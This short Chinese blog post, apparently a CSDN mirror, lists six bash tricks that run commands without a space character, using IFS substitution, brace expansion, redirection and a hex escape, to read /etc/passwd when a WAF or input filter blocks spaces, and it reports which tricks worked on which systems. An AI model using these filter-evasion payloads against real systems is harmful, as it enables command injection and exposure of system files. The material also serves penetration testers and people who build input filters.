bashtricks ：无空格命令执行

「已注销」

于 2020-03-22 10:43:40 发布

阅读量389

点赞数

CC 4.0 BY-SA版权

本文链接：https://blog.youkuaiyun.com/glawhack/article/details/105068478

本文介绍了一系列在特定环境下，如存在WAF防护或无法使用空格字符时，用于读取系统文件的Shell命令技巧。这些命令适用于Ubuntu19.10和CentOS7等系统，但部分命令在macOS下可能因解析问题而失败。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

在一些漏洞利用场景，或者因为waf等原因，导致无法使用空格时，可以试试如下命令：

IFS=,;`cat<<<cat,/etc/passwd` 
cat$IFS/etc/passwd 
cat${IFS}/etc/passwd 
cat</etc/passwd 
{cat,/etc/passwd} 
X=$'cat\x20/etc/passwd'&&$X

经过测试，除最后一条在mac osx下执行失败，这些命令在ubuntu 19.10和centos7下均执行成功。在mac osx系统下系统会将cat\x20/etc/passwd当成一个可执行文件，会提示No such file or directory。